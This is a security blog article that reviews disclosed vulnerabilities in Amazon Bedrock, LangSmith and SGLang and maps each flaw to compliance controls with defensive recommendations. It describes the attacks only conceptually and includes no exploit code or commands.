Skip to main content
Three AI Platforms, Three Critical FlawsIncident
5 min readFor Security Engineers

Three AI Platforms, Three Critical Flaws

Your AI infrastructure just became an exfiltration pipeline. Recent disclosures reveal how Amazon Bedrock, LangSmith, and SGLang each failed fundamental security controls—and how those failures map directly to requirements you're already supposed to meet.

What Happened

Three separate research teams disclosed vulnerabilities in widely-deployed AI platforms:

Amazon Bedrock (BeyondTrust disclosure): The platform's sandbox mode permits outbound DNS queries, allowing attackers to exfiltrate data and execute commands through DNS tunneling—despite the sandbox being marketed as network-isolated.

LangSmith (Miggo Security disclosure): CVE-2026-25750 allows attackers to steal authentication tokens and take over accounts through URL parameter injection. The flaw stems from improper input validation on user-supplied URLs.

SGLang (CERT Coordination Center advisory): Two vulnerabilities—CVE-2026-3059 and CVE-2026-3060—permit remote code execution through unsafe pickle deserialization. Attackers can execute arbitrary code by sending malicious serialized objects to the framework.

None of these are zero-days requiring nation-state resources. Each exploits a control gap that existing standards already address.

Timeline

The exact discovery and exploitation timelines remain under disclosure coordination. What matters: these vulnerabilities existed in production environments processing sensitive data before patches became available. The DNS exfiltration vector in Bedrock is particularly concerning because it operates silently—no failed authentication attempts, no unusual file access patterns, just routine DNS traffic carrying encoded payloads.

Which Controls Failed

Network Segmentation (Bedrock)

Amazon Bedrock's sandbox allowed outbound DNS queries. This violates the core principle of network isolation: if you're running untrusted code in a sandbox, that sandbox shouldn't have unrestricted network access—especially not to services that can encode arbitrary data.

The failure isn't that DNS queries are inherently dangerous. The failure is treating "sandbox mode" as sufficient isolation without implementing egress filtering. Your firewall rules should answer: what external services does this AI workload legitimately need? If the answer is "none," then DNS queries to attacker-controlled domains shouldn't be possible.

Standard mapping: NIST 800-53 Rev 5 requires network segmentation (SC-7) and boundary protection that monitors and controls communications at external boundaries. PCI DSS v4.0.1 Requirement 1.3.1 mandates restricting inbound and outbound traffic to that which is necessary. A sandbox that allows arbitrary DNS queries fails both.

Input Validation (LangSmith)

LangSmith's CVE-2026-25750 stems from accepting user-supplied URLs without proper validation. The application trusted that URL parameters would be benign, allowing attackers to inject malicious values that the system then processed.

This is OWASP Top 10 2021 A03:2021 – Injection. You're accepting external input, using it in a security-sensitive context (authentication flow), and not validating that the input conforms to expected patterns.

Standard mapping: OWASP ASVS v4.0.3 Section 5.1 requires input validation on all untrusted data. ISO 27001 Control 8.3 addresses secure handling of information in applications. If your AI platform accepts URLs from users, you need to validate format, whitelist allowed domains, and sanitize before processing.

Secure Coding Practices (SGLang)

SGLang's use of pickle deserialization for handling untrusted data represents a known-dangerous pattern. Python's pickle module documentation explicitly warns against deserializing data from untrusted sources—yet the framework did exactly that.

The CVE-2026-3059 and CVE-2026-3060 vulnerabilities allow remote code execution because the application deserializes attacker-controlled objects without verification. This isn't a novel attack vector; it's a well-documented anti-pattern.

Standard mapping: OWASP Top 10 2021 A08:2021 – Software and Data Integrity Failures covers insecure deserialization. NIST 800-53 Rev 5 SI-10 requires information input validation. PCI DSS v4.0.1 Requirement 6.2.4 mandates that software engineering techniques prevent or mitigate common software attacks.

What the Standards Require

These incidents map to controls you're likely already attesting to:

For network isolation: Implement egress filtering at the network boundary. If your AI workload runs in a sandbox, define an allowlist of required external services. Block everything else. NIST CSF v2.0 function PR.AC-5 (network segregation) and PR.PT-4 (communications and control networks protection) both apply.

For input validation: Treat all external input as hostile. URL parameters, file uploads, API payloads—validate format, length, and content against expected patterns before processing. This satisfies OWASP ASVS v4.0.3 requirements and ISO/IEC 27001:2022 Control 8.3.

For deserialization: Never deserialize untrusted data using formats that permit code execution. If you must deserialize external data, use safe formats (JSON, Protocol Buffers) or implement signature verification. This addresses NIST 800-53 Rev 5 SI-10 and supports SOC 2 Type II CC6.1 (logical access controls).

Lessons and Action Items

Audit Your AI Infrastructure

Map every AI platform you're running against these questions:

  • What network access does it have? Can it make outbound connections?
  • What external input does it accept? URLs, file uploads, API calls?
  • Does it deserialize data from external sources? Using what format?

For each "yes," document the control that prevents exploitation. If you can't name the control, you have a gap.

Implement Defense in Depth for AI Workloads

Don't rely on vendor-provided "sandbox mode" as your only isolation layer. Add network segmentation, egress filtering, and monitoring. Your SIEM should alert on unexpected DNS queries from AI workloads—especially queries to newly-registered domains or domains with high entropy in the subdomain (common in DNS tunneling).

Apply Least Privilege to IAM Roles

The Bedrock vulnerability becomes more severe if the compromised workload has broad IAM permissions. Review every IAM role attached to AI infrastructure. What's the minimum permission set required? Remove everything else. This limits blast radius when—not if—a vulnerability is exploited.

Require Security Review for AI Framework Updates

Treat AI frameworks like SGLang the same way you treat application dependencies. Before deploying a new version, review the changelog for security-relevant changes. If the framework handles deserialization, that's a red flag requiring extra scrutiny.

Test Your Detection Capabilities

Can your security tools detect DNS tunneling? Can they identify unusual outbound connections from supposedly-isolated workloads? Run a purple team exercise: attempt DNS exfiltration from your AI environment. If your tools don't alert, fix your detection before an attacker discovers the same gap.

The common thread: these vulnerabilities exploited the gap between "AI platform" and "production security controls." Your AI infrastructure needs the same network segmentation, input validation, and secure coding practices as everything else you run. The standards already require it—now you need to enforce it.

Topics:Incident

You Might Also Like